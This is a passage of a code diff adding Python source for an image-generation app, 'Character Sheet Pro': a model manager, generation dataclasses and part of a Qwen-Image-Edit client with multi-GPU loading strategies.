self._current_backend = backend
|
| 218 |
+
self._state = ModelState.READY
|
| 219 |
+
self._loading_progress = 1.0
|
| 220 |
+
self._loading_message = "Ready"
|
| 221 |
+
|
| 222 |
+
logger.info(f"Model {backend.value} loaded and validated successfully")
|
| 223 |
+
return True
|
| 224 |
+
|
| 225 |
+
except Exception as e:
|
| 226 |
+
error_msg = str(e)
|
| 227 |
+
logger.error(f"Failed to load model {backend.value}: {error_msg}", exc_info=True)
|
| 228 |
+
|
| 229 |
+
with self._lock:
|
| 230 |
+
self._state = ModelState.ERROR
|
| 231 |
+
self._error_message = self._simplify_error(error_msg)
|
| 232 |
+
self._service = None
|
| 233 |
+
|
| 234 |
+
if progress_callback:
|
| 235 |
+
progress_callback(0.0, f"Error: {self._error_message}")
|
| 236 |
+
|
| 237 |
+
return False
|
| 238 |
+
|
| 239 |
+
def _validate_model(self) -> Tuple[bool, Optional[str]]:
|
| 240 |
+
"""
|
| 241 |
+
Validate that the model is actually working.
|
| 242 |
+
|
| 243 |
+
For local models, checks that the pipeline is loaded.
|
| 244 |
+
For cloud backends, does a minimal health check.
|
| 245 |
+
|
| 246 |
+
Returns:
|
| 247 |
+
Tuple of (is_valid, error_message)
|
| 248 |
+
"""
|
| 249 |
+
if self._service is None:
|
| 250 |
+
return False, "Service not initialized"
|
| 251 |
+
|
| 252 |
+
try:
|
| 253 |
+
client = self._service.client
|
| 254 |
+
|
| 255 |
+
# Check if client has health check method
|
| 256 |
+
if hasattr(client, 'is_healthy'):
|
| 257 |
+
if not client.is_healthy():
|
| 258 |
+
return False, "Client health check failed"
|
| 259 |
+
|
| 260 |
+
# For local models, check pipeline is loaded
|
| 261 |
+
if hasattr(client, '_loaded'):
|
| 262 |
+
if not client._loaded:
|
| 263 |
+
return False, "Model pipeline not loaded"
|
| 264 |
+
|
| 265 |
+
# For FLUX models, verify the pipe exists
|
| 266 |
+
if hasattr(client, 'pipe'):
|
| 267 |
+
if client.pipe is None:
|
| 268 |
+
return False, "Model pipeline is None"
|
| 269 |
+
|
| 270 |
+
return True, None
|
| 271 |
+
|
| 272 |
+
except Exception as e:
|
| 273 |
+
return False, str(e)
|
| 274 |
+
|
| 275 |
+
def _simplify_error(self, error: str) -> str:
|
| 276 |
+
"""Simplify technical error messages for user display."""
|
| 277 |
+
error_lower = error.lower()
|
| 278 |
+
|
| 279 |
+
if "cuda out of memory" in error_lower or "out of memory" in error_lower:
|
| 280 |
+
return "Not enough GPU memory. Try a smaller model or close other applications."
|
| 281 |
+
|
| 282 |
+
if "api key" in error_lower:
|
| 283 |
+
return "Invalid or missing API key."
|
| 284 |
+
|
| 285 |
+
if "connection" in error_lower or "network" in error_lower:
|
| 286 |
+
return "Network connection error. Check your internet connection."
|
| 287 |
+
|
| 288 |
+
if "not found" in error_lower and "model" in error_lower:
|
| 289 |
+
return "Model files not found. The model may need to be downloaded."
|
| 290 |
+
|
| 291 |
+
if "import" in error_lower:
|
| 292 |
+
return "Missing dependencies. Some required packages are not installed."
|
| 293 |
+
|
| 294 |
+
if "meta tensor" in error_lower:
|
| 295 |
+
return "Model loading failed (meta tensor error). Try restarting the application."
|
| 296 |
+
|
| 297 |
+
# Truncate long errors
|
| 298 |
+
if len(error) > 100:
|
| 299 |
+
return error[:97] + "..."
|
| 300 |
+
|
| 301 |
+
return error
|
| 302 |
+
|
| 303 |
+
def unload(self):
|
| 304 |
+
"""Unload the current model."""
|
| 305 |
+
with self._lock:
|
| 306 |
+
if self._service:
|
| 307 |
+
try:
|
| 308 |
+
if hasattr(self._service, 'router'):
|
| 309 |
+
self._service.router.unload_local_models()
|
| 310 |
+
except Exception as e:
|
| 311 |
+
logger.warning(f"Error during unload: {e}")
|
| 312 |
+
self._service = None
|
| 313 |
+
|
| 314 |
+
self._state = ModelState.UNLOADED
|
| 315 |
+
self._current_backend = None
|
| 316 |
+
self._error_message = None
|
| 317 |
+
self._loading_progress = 0.0
|
| 318 |
+
self._loading_message = ""
|
| 319 |
+
|
| 320 |
+
logger.info("Model unloaded")
|
| 321 |
+
|
| 322 |
+
|
| 323 |
+
# Global singleton for model management
|
| 324 |
+
_model_manager: Optional[ModelManager] = None
|
| 325 |
+
|
| 326 |
+
|
| 327 |
+
def get_model_manager() -> ModelManager:
|
| 328 |
+
"""Get the global ModelManager instance."""
|
| 329 |
+
global _model_manager
|
| 330 |
+
if _model_manager is None:
|
| 331 |
+
_model_manager = ModelManager()
|
| 332 |
+
return _model_manager
|
src/models.py
ADDED
|
@@ -0,0 +1,94 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Data Models for Character Sheet Pro
|
| 3 |
+
====================================
|
| 4 |
+
|
| 5 |
+
Dataclasses for generation requests and results.
|
| 6 |
+
"""
|
| 7 |
+
|
| 8 |
+
from dataclasses import dataclass, field
|
| 9 |
+
from typing import Optional, List, Dict, Any
|
| 10 |
+
from PIL import Image
|
| 11 |
+
from datetime import datetime
|
| 12 |
+
|
| 13 |
+
|
| 14 |
+
@dataclass
|
| 15 |
+
class GenerationRequest:
|
| 16 |
+
"""Request for image generation."""
|
| 17 |
+
|
| 18 |
+
prompt: str
|
| 19 |
+
input_images: List[Image.Image] = field(default_factory=list)
|
| 20 |
+
aspect_ratio: str = "1:1"
|
| 21 |
+
temperature: float = 0.4
|
| 22 |
+
negative_prompt: Optional[str] = None
|
| 23 |
+
|
| 24 |
+
@property
|
| 25 |
+
def has_input_images(self) -> bool:
|
| 26 |
+
"""Check if request has input images."""
|
| 27 |
+
return len(self.input_images) > 0
|
| 28 |
+
|
| 29 |
+
|
| 30 |
+
@dataclass
|
| 31 |
+
class GenerationResult:
|
| 32 |
+
"""Result from image generation."""
|
| 33 |
+
|
| 34 |
+
success: bool
|
| 35 |
+
image: Optional[Image.Image] = None
|
| 36 |
+
message: str = ""
|
| 37 |
+
generation_time: Optional[float] = None
|
| 38 |
+
|
| 39 |
+
@classmethod
|
| 40 |
+
def success_result(
|
| 41 |
+
cls,
|
| 42 |
+
image: Image.Image,
|
| 43 |
+
message: str = "Generated successfully",
|
| 44 |
+
generation_time: Optional[float] = None
|
| 45 |
+
) -> "GenerationResult":
|
| 46 |
+
"""Create successful result."""
|
| 47 |
+
return cls(
|
| 48 |
+
success=True,
|
| 49 |
+
image=image,
|
| 50 |
+
message=message,
|
| 51 |
+
generation_time=generation_time
|
| 52 |
+
)
|
| 53 |
+
|
| 54 |
+
@classmethod
|
| 55 |
+
def error_result(cls, message: str) -> "GenerationResult":
|
| 56 |
+
"""Create error result."""
|
| 57 |
+
return cls(success=False, message=message)
|
| 58 |
+
|
| 59 |
+
|
| 60 |
+
@dataclass
|
| 61 |
+
class CharacterSheetConfig:
|
| 62 |
+
"""Configuration for character sheet generation."""
|
| 63 |
+
|
| 64 |
+
# Aspect ratios
|
| 65 |
+
face_aspect_ratio: str = "3:4" # 864x1184
|
| 66 |
+
body_aspect_ratio: str = "9:16" # 768x1344
|
| 67 |
+
|
| 68 |
+
# Generation temperatures
|
| 69 |
+
face_temperature: float = 0.35
|
| 70 |
+
body_temperature: float = 0.35
|
| 71 |
+
normalize_temperature: float = 0.5
|
| 72 |
+
|
| 73 |
+
# Layout
|
| 74 |
+
spacing: int = 20
|
| 75 |
+
background_color: str = "#2C2C2C"
|
| 76 |
+
|
| 77 |
+
# Retry settings
|
| 78 |
+
max_retries: int = 3
|
| 79 |
+
retry_delay: float = 30.0
|
| 80 |
+
rate_limit_delay_min: float = 2.0
|
| 81 |
+
rate_limit_delay_max: float = 3.0
|
| 82 |
+
|
| 83 |
+
|
| 84 |
+
@dataclass
|
| 85 |
+
class CharacterSheetMetadata:
|
| 86 |
+
"""Metadata for generated character sheet."""
|
| 87 |
+
|
| 88 |
+
character_name: str
|
| 89 |
+
input_type: str # "Face Only", "Full Body", "Face + Body"
|
| 90 |
+
costume_description: str
|
| 91 |
+
backend: str
|
| 92 |
+
timestamp: str = field(default_factory=lambda: datetime.now().isoformat())
|
| 93 |
+
views: int = 7
|
| 94 |
+
stages: Dict[str, Any] = field(default_factory=dict)
|
src/qwen_image_edit_client.py
ADDED
|
@@ -0,0 +1,495 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Qwen-Image-Edit Client
|
| 3 |
+
======================
|
| 4 |
+
|
| 5 |
+
Client for Qwen-Image-Edit-2511 local image editing.
|
| 6 |
+
Supports multi-image editing with improved consistency.
|
| 7 |
+
|
| 8 |
+
GPU loading strategies (benchmarked on A6000 + A5000):
|
| 9 |
+
Pinned 2-GPU: 169.9s (4.25s/step) - 1.36x vs baseline
|
| 10 |
+
Balanced single-GPU: 184.4s (4.61s/step) - 1.25x vs baseline
|
| 11 |
+
CPU offload: 231.5s (5.79s/step) - baseline
|
| 12 |
+
"""
|
| 13 |
+
|
| 14 |
+
import logging
|
| 15 |
+
import time
|
| 16 |
+
import types
|
| 17 |
+
from typing import Optional, List
|
| 18 |
+
from PIL import Image
|
| 19 |
+
|
| 20 |
+
import torch
|
| 21 |
+
|
| 22 |
+
from .models import GenerationRequest, GenerationResult
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
logger = logging.getLogger(__name__)
|
| 26 |
+
|
| 27 |
+
|
| 28 |
+
class QwenImageEditClient:
|
| 29 |
+
"""
|
| 30 |
+
Client for Qwen-Image-Edit-2511 model.
|
| 31 |
+
|
| 32 |
+
Supports:
|
| 33 |
+
- Multi-image editing (up to multiple reference images)
|
| 34 |
+
- Precise text editing
|
| 35 |
+
- Improved character consistency
|
| 36 |
+
- LoRA integration
|
| 37 |
+
"""
|
| 38 |
+
|
| 39 |
+
# Model variants
|
| 40 |
+
MODELS = {
|
| 41 |
+
"full": "Qwen/Qwen-Image-Edit", # Official Qwen model
|
| 42 |
+
}
|
| 43 |
+
|
| 44 |
+
# Legacy compatibility
|
| 45 |
+
MODEL_ID = MODELS["full"]
|
| 46 |
+
|
| 47 |
+
# Aspect ratio to dimensions mapping (target output sizes)
|
| 48 |
+
ASPECT_RATIOS = {
|
| 49 |
+
"1:1": (1328, 1328),
|
| 50 |
+
"16:9": (1664, 928),
|
| 51 |
+
"9:16": (928, 1664),
|
| 52 |
+
"21:9": (1680, 720), # Cinematic ultra-wide
|
| 53 |
+
"3:2": (1584, 1056),
|
| 54 |
+
"2:3": (1056, 1584),
|
| 55 |
+
"3:4": (1104, 1472),
|
| 56 |
+
"4:3": (1472, 1104),
|
| 57 |
+
"4:5": (1056, 1320),
|
| 58 |
+
"5:4": (1320, 1056),
|
| 59 |
+
}
|
| 60 |
+
|
| 61 |
+
# Proven native generation resolution. Tested resolutions:
|
| 62 |
+
# 1104x1472 (3:4) → CLEAN output (face views in v1 test)
|
| 63 |
+
# 928x1664 (9:16) → VAE tiling noise / garbage
|
| 64 |
+
# 1328x1328 (1:1) → VAE tiling noise / garbage
|
| 65 |
+
# 896x1184 (auto) → garbage
|
| 66 |
+
# Always generate at 1104x1472, then crop+resize to target.
|
| 67 |
+
NATIVE_RESOLUTION = (1104, 1472)
|
| 68 |
+
|
| 69 |
+
# VRAM thresholds for loading strategies
|
| 70 |
+
# Qwen-Image-Edit components: transformer ~40.9GB, text_encoder ~16.6GB, VAE ~0.25GB
|
| 71 |
+
BALANCED_VRAM_THRESHOLD_GB = 45 # Single GPU balanced (needs ~42GB + headroom)
|
| 72 |
+
MAIN_GPU_MIN_VRAM_GB = 42 # Transformer + VAE minimum
|
| 73 |
+
ENCODER_GPU_MIN_VRAM_GB = 17 # Text encoder minimum
|
| 74 |
+
|
| 75 |
+
def __init__(
|
| 76 |
+
self,
|
| 77 |
+
model_variant: str = "full", # Use full model (~50GB)
|
| 78 |
+
device: str = "cuda",
|
| 79 |
+
dtype: torch.dtype = torch.bfloat16,
|
| 80 |
+
enable_cpu_offload: bool = True,
|
| 81 |
+
encoder_device: Optional[str] = None,
|
| 82 |
+
):
|
| 83 |
+
"""
|
| 84 |
+
Initialize Qwen-Image-Edit client.
|
| 85 |
+
|
| 86 |
+
Args:
|
| 87 |
+
model_variant: Model variant ("full" for ~50GB)
|
| 88 |
+
device: Device to use for transformer+VAE (cuda or cuda:N)
|
| 89 |
+
dtype: Data type for model weights
|
| 90 |
+
enable_cpu_offload: Enable CPU offload to save VRAM
|
| 91 |
+
encoder_device: Explicit device for text_encoder (e.g. "cuda:3").
|
| 92 |
+
If None, auto-detected from available GPUs.
|
| 93 |
+
"""
|
| 94 |
+
self.model_variant = model_variant
|
| 95 |
+
self.device = device
|
| 96 |
+
self.dtype = dtype
|
| 97 |
+
self.enable_cpu_offload = enable_cpu_offload
|
| 98 |
+
self.encoder_device = encoder_device
|
| 99 |
+
self.pipe = None
|
| 100 |
+
self._loaded = False
|
| 101 |
+
self._loading_strategy = None
|
| 102 |
+
|
| 103 |
+
logger.info(f"QwenImageEditClient initialized (variant: {model_variant})")
|
| 104 |
+
|
| 105 |
+
@staticmethod
|
| 106 |
+
def _get_gpu_vram_gb(device_idx: int) -> float:
|
| 107 |
+
"""Get total VRAM in GB for a specific GPU."""
|
| 108 |
+
if not torch.cuda.is_available():
|
| 109 |
+
return 0.0
|
| 110 |
+
if device_idx >= torch.cuda.device_count():
|
| 111 |
+
return 0.0
|
| 112 |
+
return torch.cuda.get_device_properties(device_idx).total_memory / 1e9
|
| 113 |
+
|
| 114 |
+
def _get_vram_gb(self) -> float:
|
| 115 |
+
"""Get available VRAM in GB for the main target device."""
|
| 116 |
+
device_idx = self._parse_device_idx(self.device)
|
| 117 |
+
return self._get_gpu_vram_gb(device_idx)
|
| 118 |
+
|
| 119 |
+
@staticmethod
|
| 120 |
+
def _parse_device_idx(device: str) -> int:
|
| 121 |
+
"""Parse CUDA device index from device string."""
|
| 122 |
+
if device.startswith("cuda:"):
|
| 123 |
+
try:
|
| 124 |
+
return int(device.split(":")[1])
|
| 125 |
+
except (ValueError, IndexError):
|
| 126 |
+
pass
|
| 127 |
+
return 0
|
| 128 |
+
|
| 129 |
+
def _find_encoder_gpu(self, main_idx: int) -> Optional[int]:
|
| 130 |
+
"""Find a secondary GPU suitable for text_encoder (>= 17GB VRAM).
|
| 131 |
+
|
| 132 |
+
Prefers GPUs with more VRAM. Skips the main GPU.
|
| 133 |
+
"""
|
| 134 |
+
if not torch.cuda.is_available():
|
| 135 |
+
return None
|
| 136 |
+
|
| 137 |
+
candidates = []
|
| 138 |
+
for i in range(torch.cuda.device_count()):
|
| 139 |
+
if i == main_idx:
|
| 140 |
+
continue
|
| 141 |
+
vram = self._get_gpu_vram_gb(i)
|
| 142 |
+
if vram >= self.ENCODER_GPU_MIN_VRAM_GB:
|
| 143 |
+
name = torch.cuda.get_device_name(i)
|
| 144 |
+
candidates.append((i, vram, name))
|
| 145 |
+
|
| 146 |
+
if not candidates:
|
| 147 |
+
return None
|
| 148 |
+
|
| 149 |
+
# Pick the GPU with the most VRAM
|
| 150 |
+
candidates.sort(key=lambda x: x[1], reverse=True)
|
| 151 |
+
best = candidates[0]
|
| 152 |
+
logger.info(f"Found encoder GPU: cuda:{best[0]} ({best[2]}, {best[1]:.1f} GB)")
|
| 153 |
+
return best[0]
|
| 154 |
+
|
| 155 |
+
@staticmethod
|
| 156 |
+
def _patched_get_qwen_prompt_embeds(self, prompt, image=None, device=None, dtype=None):
|
| 157 |
+
"""Patched prompt encoding that routes inputs to text_encoder's device.
|
| 158 |
+
|
| 159 |
+
The original _get_qwen_prompt_embeds sends model_inputs to
|
| 160 |
+
execution_device (main GPU), then calls text_encoder on a different
|
| 161 |
+
GPU, causing a device mismatch. This patch:
|
| 162 |
+
1. Sends model_inputs to text_encoder's device for encoding
|
| 163 |
+
2. Moves outputs back to execution_device for the transformer
|
| 164 |
+
"""
|
| 165 |
+
te_device = next(self.text_encoder.parameters()).device
|
| 166 |
+
execution_device = device or self._execution_device
|
| 167 |
+
dtype = dtype or self.text_encoder.dtype
|
| 168 |
+
|
| 169 |
+
prompt = [prompt] if isinstance(prompt, str) else prompt
|
| 170 |
+
|
| 171 |
+
template = self.prompt_template_encode
|
| 172 |
+
drop_idx = self.prompt_template_encode_start_idx
|
| 173 |
+
txt = [template.format(e) for e in prompt]
|
| 174 |
+
|
| 175 |
+
# Route to text_encoder's device, NOT execution_device
|
| 176 |
+
model_inputs = self.processor(
|
| 177 |
+
text=txt, images=image, padding=True, return_tensors="pt"
|
| 178 |
+
).to(te_device)
|
| 179 |
+
|
| 180 |
+
outputs = self.text_encoder(
|
| 181 |
+
input_ids=model_inputs.input_ids,
|
| 182 |
+
attention_mask=model_inputs.attention_mask,
|
| 183 |
+
pixel_values=model_inputs.pixel_values,
|
| 184 |
+
image_grid_thw=model_inputs.image_grid_thw,
|
| 185 |
+
output_hidden_states=True,
|
| 186 |
+
)
|
| 187 |
+
|
| 188 |
+
hidden_states = outputs.hidden_states[-1]
|
| 189 |
+
split_hidden_states = self._extract_masked_hidden(
|
| 190 |
+
hidden_states, model_inputs.attention_mask)
|
| 191 |
+
split_hidden_states = [e[drop_idx:] for e in split_hidden_states]
|
| 192 |
+
attn_mask_list = [
|
| 193 |
+
torch.ones(e.size(0), dtype=torch.long, device=e.device)
|
| 194 |
+
for e in split_hidden_states
|
| 195 |
+
]
|
| 196 |
+
max_seq_len = max([e.size(0) for e in split_hidden_states])
|
| 197 |
+
prompt_embeds = torch.stack([
|
| 198 |
+
torch.cat([u, u.new_zeros(max_seq_len - u.size(0), u.size(1))])
|
| 199 |
+
for u in split_hidden_states
|
| 200 |
+
])
|
| 201 |
+
encoder_attention_mask = torch.stack([
|
| 202 |
+
torch.cat([u, u.new_zeros(max_seq_len - u.size(0))])
|
| 203 |
+
for u in attn_mask_list
|
| 204 |
+
])
|
| 205 |
+
|
| 206 |
+
# Move outputs to execution_device for transformer
|
| 207 |
+
prompt_embeds = prompt_embeds.to(dtype=dtype, device=execution_device)
|
| 208 |
+
encoder_attention_mask = encoder_attention_mask.to(device=execution_device)
|
| 209 |
+
|
| 210 |
+
return prompt_embeds, encoder_attention_mask
|
| 211 |
+
|
| 212 |
+
def _load_pinned_multi_gpu(self, model_id: str, main_idx: int, encoder_idx: int) -> bool:
|
| 213 |
+
"""Load with pinned multi-GPU: transformer+VAE on main, text_encoder on secondary.
|
| 214 |
+
|
| 215 |
+
Benchmarked at 169.9s (4.25s/step) - 1.36x faster than cpu_offload baseline.
|
| 216 |
+
"""
|
| 217 |
+
from diffusers import QwenImageEditPipeline
|
| 218 |
+
from diffusers.schedulers import FlowMatchEulerDiscreteScheduler
|
| 219 |
+
from diffusers.models.transformers.transformer_qwenimage import QwenImageTransformer2DModel
|
| 220 |
+
from diffusers.models.autoencoders.autoencoder_kl_qwenimage import AutoencoderKLQwenImage
|
| 221 |
+
from transformers import Qwen2_5_VLForConditionalGeneration, Qwen2Tokenizer, Qwen2VLProcessor
|
| 222 |
+
|
| 223 |
+
main_dev = f"cuda:{main_idx}"
|
| 224 |
+
enc_dev = f"cuda:{encoder_idx}"
|
| 225 |
+
|
| 226 |
+
logger.info(f"Loading pinned 2-GPU: transformer+VAE → {main_dev}, text_encoder → {enc_dev}")
|
| 227 |
+
|
| 228 |
+
scheduler = FlowMatchEulerDiscreteScheduler.from_pretrained(
|
| 229 |
+
model_id, subfolder="scheduler")
|
| 230 |
+
tokenizer = Qwen2Tokenizer.from_pretrained(
|
| 231 |
+
model_id, subfolder="tokenizer")
|
| 232 |
+
processor = Qwen2VLProcessor.from_pretrained(
|
| 233 |
+
model_id, subfolder="processor")
|
| 234 |
+
|
| 235 |
+
text_encoder = Qwen2_5_VLForConditionalGeneration.from_pretrained(
|
| 236 |
+
model_id, subfolder="text_encoder", torch_dtype=self.dtype,
|
| 237 |
+
).to(enc_dev)
|
| 238 |
+
logger.info(f" text_encoder loaded on {enc_dev}")
|
| 239 |
+
|
| 240 |
+
transformer = QwenImageTransformer2DModel.from_pretrained(
|
| 241 |
+
model_id, subfolder="transformer", torch_dtype=self.dtype,
|
| 242 |
+
).to(main_dev)
|
| 243 |
+
logger.info(f" transformer loaded on {main_dev}")
|
| 244 |
+
|
| 245 |
+
vae = AutoencoderKLQwenImage.from_pretrained(
|
| 246 |
+
model_id, subfolder="vae", torch_dtype=self.dtype,
|
| 247 |
+
).to(main_dev)
|
| 248 |
+
vae.enable_tiling()
|
| 249 |
+
logger.info(f" VAE loaded on {main_dev}")
|
| 250 |
+
|
| 251 |
+
self.pipe = QwenImageEditPipeline(
|
| 252 |
+
scheduler=scheduler, vae=vae, text_encoder=text_encoder,
|
| 253 |
+
tokenizer=tokenizer, processor=processor, transformer=transformer,
|
| 254 |
+
)
|
| 255 |
+
|
| 256 |
+
# Fix 1: Override _execution_device to force main GPU
|
| 257 |
+
# Without this, pipeline returns text_encoder's device, causing VAE
|
| 258 |
+
# to receive tensors on the wrong GPU
|
| 259 |
+
main_device = torch.device(main_dev)
|
| 260 |
+
QwenImageEditPipeline._execution_device = property(lambda self: main_device)
|
| 261 |
+
|
| 262 |
+
# Fix 2: Monkey-patch prompt encoding to route inputs to text_encoder's device
|
| 263 |
+
self.pipe._get_qwen_prompt_embeds = types.MethodType(
|
| 264 |
+
self._patched_get_qwen_prompt_embeds, self.pipe)
|
| 265 |
+
|
| 266 |
+
self._loading_strategy = "pinned_multi_gpu"
|
| 267 |
+
logger.info(f"Pinned 2-GPU pipeline ready")
|
| 268 |
+
return True
|
| 269 |
+
|
| 270 |
+
def load_model(self) -> bool:
|
| 271 |
+
"""Load the model with the best available strategy.
|
| 272 |
+
|
| 273 |
+
Strategy priority (GPU strategies always attempted first):
|
| 274 |
+
1. Pinned 2-GPU: transformer+VAE on large GPU, text_encoder on secondary
|
| 275 |
+
(requires main GPU >= 42GB, secondary >= 17GB)
|
| 276 |
+
Benchmark: 169.9s (4.25s/step) - 1.36x
|
| 277 |
+
2. Balanced single-GPU: device_map="balanced" on single large GPU
|
| 278 |
+
(requires GPU >= 45GB)
|
| 279 |
+
Benchmark: 184.4s (4.61s/step) - 1.25x
|
| 280 |
+
3. CPU offload: model components shuttle between CPU and GPU
|
| 281 |
+
(requires enable_cpu_offload=True)
|
| 282 |
+
Benchmark: 231.5s (5.79s/step) - 1.0x baseline
|
| 283 |
+
4. Direct load: entire model on single GPU (may OOM)
|
| 284 |
+
"""
|
| 285 |
+
if self._loaded:
|
| 286 |
+
return True
|
| 287 |
+
|
| 288 |
+
try:
|
| 289 |
+
from diffusers import QwenImageEditPipeline
|
| 290 |
+
|
| 291 |
+
model_id = self.MODELS.get(self.model_variant, self.MODELS["full"])
|
| 292 |
+
main_idx = self._parse_device_idx(self.device)
|
| 293 |
+
main_vram = self._get_gpu_vram_gb(main_idx)
|
| 294 |
+
logger.info(f"Loading Qwen-Image-Edit ({self.model_variant}) from {model_id}...")
|
| 295 |
+
